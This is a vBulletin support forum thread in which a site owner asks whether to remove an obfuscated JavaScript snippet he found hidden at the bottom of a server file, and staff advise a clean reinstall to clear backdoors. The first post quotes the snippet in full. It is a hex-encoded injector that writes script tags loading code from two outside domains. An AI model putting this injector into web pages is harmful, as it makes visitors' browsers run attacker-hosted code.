Announcement

Collapse
No announcement yet.

Okay to remove file var _0xe62f from java.cs?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] Okay to remove file var _0xe62f from java.cs?

    On another thread the file var _0xe62f was quoted as a potential culprit in web attacks. In my .cs file for java, I found this same file at the very bottom on Line 558 as if it were placed there to be hidden. I copied and removed it, and the site seems to be working okay. Here is the code:
    PHP Code:
    var _0xe62f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6F\x65\x69\x31\x2E\x67\x71\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6D\x66\x69\x6F\x2E\x63\x66\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"];document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2]) 

    DAVID COPELAND
    Licensed VB Holder Since 2000
    Celebrating 20 Years with VB

  • #2
    vBulletin doesn't use Java. It does use Javascript. These are two completely different languages without relationship to each other despite the poor choice of names.

    vBulletin does not have any files with the .cs extension. If you don't know what this file does, then you should delete it. You shouldn't allow files on your server that you don't know what they do.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment


    • #3
      Originally posted by Wayne Luke View Post
      vBulletin doesn't use Java. It does use Javascript. These are two completely different languages without relationship to each other despite the poor choice of names.

      vBulletin does not have any files with the .cs extension. If you don't know what this file does, then you should delete it. You shouldn't allow files on your server that you don't know what they do.
      To better determine what the code related to, I did a Google search and the first hit was:

      https://www.vbulletin.com/forum/foru...-patch-level-4

      Another site that offers various VB support also had the same code listed on one of their threads. The actual code may not be a VB file, but it appears there may be backdoor shells in place.

      After spending 4 hours going through server and CPanel files, I was able to stop the intrusiveness. Our server access is turned off to anyone who is not using our dedicated IP address. But I will be looking for some more tips (backdoor preventives) to help make this nightmare see a glimmer of hope.


      DAVID COPELAND
      Licensed VB Holder Since 2000
      Celebrating 20 Years with VB

      Comment


      • #4
        If you're not currently using vBulletin 4.2.5 with a fresh set of files then you'll have problems. Patches do not remove exploits from your site. If you patched to 4.2.2 PL4 back in 2013, or so, and didn't remove any backdoor exploit, it would have remained until today. You have to remove these manually. We have an entire topic on this stickied in this forum.

        https://www.vbulletin.com/forum/foru...ring-your-site

        Here is what I would do...

        1) Log into the AdminCP and disable all third-party products.
        2) Rename my vBulletin directory to something else.
        3) Create a new directory to hold vBulletin.
        4) Upload new files from a fresh download of vBulletin 4.2.5.
        5. Use these files to run your forum.

        Other options would be upgrading to vBulletin 5.5.0 or vBulletin Cloud.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API

        Comment

        Related Topics

        Collapse

        Working...
        X